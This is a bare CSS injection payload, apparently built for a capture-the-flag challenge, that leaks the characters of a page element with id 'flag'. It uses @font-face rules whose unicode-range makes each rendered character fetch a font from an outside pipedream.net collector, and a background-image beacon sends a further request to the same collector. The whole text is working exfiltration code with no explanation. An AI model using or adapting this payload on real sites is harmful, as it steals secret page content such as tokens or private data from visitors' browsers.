body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W15')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w15,p98w15,p106w15,p112w15,p115w15,p121w15,p122w15,p48w15,p49w15,p52w15,p53w15,p55w15,p125w15,monospace;width:15ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W15');unicode-range:U+0061}
@font-face{font-family:p98w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W15');unicode-range:U+0062}
@font-face{font-family:p106w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W15');unicode-range:U+006A}
@font-face{font-family:p112w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W15');unicode-range:U+0070}
@font-face{font-family:p115w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W15');unicode-range:U+0073}
@font-face{font-family:p121w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W15');unicode-range:U+0079}
@font-face{font-family:p122w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W15');unicode-range:U+007A}
@font-face{font-family:p48w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W15');unicode-range:U+0030}
@font-face{font-family:p49w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W15');unicode-range:U+0031}
@font-face{font-family:p52w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W15');unicode-range:U+0034}
@font-face{font-family:p53w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W15');unicode-range:U+0035}
@font-face{font-family:p55w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W15');unicode-range:U+0037}
@font-face{font-family:p125w15;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W15');unicode-range:U+007D}
